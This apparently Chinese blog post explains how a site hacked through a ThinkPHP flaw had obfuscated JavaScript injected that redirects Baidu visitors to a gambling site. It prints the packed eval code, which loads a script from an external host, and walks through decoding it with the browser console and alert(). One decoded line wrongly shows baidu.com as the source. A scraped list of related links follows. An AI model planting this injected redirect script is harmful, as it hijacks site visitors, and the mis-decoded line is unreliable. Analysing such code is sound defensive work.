网页文件被加入恶意百度跳转代码\x64\x6f\x63\x75\x6d\x65\x6e\x74 【解密】
前几天,用了tp的框架,后来tp被爆出了漏洞,导致网站被植入了时式彩代码。通过百度搜索进入的用户,直接跳转到这个网站里。今天教给大家怎么解密这种采用eval加密的js代码。
恶意代码源码是这样的:
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="关键词1,关键词2,关键词3-"}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\e\\c\\1\\l\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\g\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\d\\6\\0\\8\\r\\0\\5\\f\\a\\s\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\o\\0\\0\\3\\2\\p\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\j\\b\\1\\c\\i\\5\\q\\j\\b\\f\\2\\6\\h\\g\\5\\2\\1\\4\\9\\3\\0\\h\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3c|x3e|x6d|x38|x79|x75|window|x6e|x68|x3a|x6b|x78|x76'.split('|'),0,{}))</script>
打开谷歌或者火狐浏览器,然后按 F12,打开console一栏,接着把这代码复制进去,
最后,去掉开头 4 个字母 eval 然后回车运行下就得到源码了。
此时,得到了这个代码:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x63\x70\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x6b\x38\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
这是一段通过16进制编码的script病毒,然后我们还需要继续解码:
可以通过alert来解密,例如把上面第一段的粗体字代码解密:
<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>
将此复制到文本文档,更改后缀保存为html格式,然后用浏览器运行就可以得出。
再复制后面的未解密代码到html里面,依次解密,解密后的代码为:
<script type="text/javascript">eval"window["document"]["write"]('<script type="text/javascript" src="https://www.baidu.com"></script>');"</script>
或者进入此网址:https://www.mokuge.com/tool/js_x16/
输入\x77\x72\x69\x74\x65,这种16进制代码进行转义就行。
网页文件被加入恶意百度跳转代码\x64\x6f\x63\x75\x6d\x65\x6e\x74 【解密】相关推荐
- 网页中加入最新款百度天气预报样式代码
iframe引入效果如下: Iframe引用代码 <iframe scrolling="no" src="https://tianqiapi.com/api.php ...
- html百度蜘蛛跳转代码,网页蜘蛛跳转代码对搜狗搜索引擎并不友好
跳转代码是微情报的站长给我.跳转代码有个好处,链接失效了不用全部更换,只需要在跳转代码里面替换下网址就行了. 因为跳转代码没有什么内容,并不希望搜索引擎蜘蛛访问.在robots协议里已经写了禁止蜘蛛访 ...
- 自动跳转代码与自动弹出网页代码
自动跳转代码与自动弹出网页代码 简单的几个页面跳转代码! 有的站点为了展现出广告,但又不影响页面访问,就采用自动跳转,在打开页面的几秒内显示广告,浏览者一定会等几秒钟,等待内容页面出现,此时就会看广告 ...
- 用python爬取动态网页上的图片(百度图片)
用python爬取动态网页上的图片(百度图片) 参考B站一个视频,视频链接: https://www.bilibili.com/video/BV1Va4y1Y7fK?share_source=copy ...
- html网页文件的主体标记,HTML的填空题:1.HTML文件中网页文件的主体标记是_________,标记页面标题的标记是_____________。如题 谢...
HTML文件中网页文件的主体标记是 ,标记页面标题的标记是. body元素是定义文档的主体,包含文档的所有内容.body是用在网页中的一种HTML标签,表示网页的主体部分,也就是用户可以看到的内容,可 ...
- 四种ASP网页跳转代码
时间:2012-06-12 21:12来源:未知 输入:铜都风尘 点击: 32987 次 如果你要在服务器端跳转,可以这样: Response.Redirect(http://blog.163.com ...
- 网页自动往下走html代码,网页自动跳转代码html
很多做博客搞网络的人并不懂技术,我也不懂,只能说会简单的操作而已,前段时间有个想法,就是让网页直接跳转,所以才找了这个网页自动跳转代码html 语言,非常简单实用,具体我想不用我多说,只需要简历个ht ...
- VB下载网页文件或图片的几种简易方法
原贴链接:http://www.suntw.com/vb6/vb-xia-zhai-wang-ye-wen-jian-he-tu-pian.html 一.使用 API 函数 URLDownloadTo ...
- html百度页面js代码,js代码让网页自动提交到百度
网站提交到百度的方法目前来说有三种,第一个主动推动(实时):第二个:自动推送:第三个:sitemap: 第一个主动推动我们之前的文章已经说过了,根据百度提供的参数,wordpress用户直接下载插件包 ...
最新文章
- 5G时代来临,高通如何让AI触手可及?
- 0X000000该内存不能read的解决方法
- OpenCV 透视变换
- 220v变12v初级线圈匝数_12V升220V升压变压器线圈绕法计算
- Tomcat的安装及使用
- 使用svn进行版本控制
- 机器学习知识总结系列- 基本概念(1-0)
- 非零返回怎么解决_VLOOKUP如何返回多个值?
- Weave Scope安装
- python mypy类型检查_Python中类型检查的详细介绍
- 台州市建筑物矢量数据(Shp格式+带高度)
- 都说IT行业有前景,请问凭什么?
- 训练过程出现trian_dice一直大于1(mask范围0-255转为0-1)
- 视觉设计师提升自己能力的17条经验(上)
- 「设计模式(六) - Builder模式」
- Hadoop机架感知配置及配置问题解决
- android蓝牙连接回调没反应,Android蓝牙套接字连接无法正常工作
- java照片切换播放音乐_音乐播放器-图片切换-轮播图效果
- pandas处理数据最多是M级?还是G?还是亿?极限数量是多少呢?
- 聚观早报 | 科技巨头组建元宇宙组织,苹果缺席;推特董事会批准马斯克收购交易;TikTok调整欧盟用户相关权利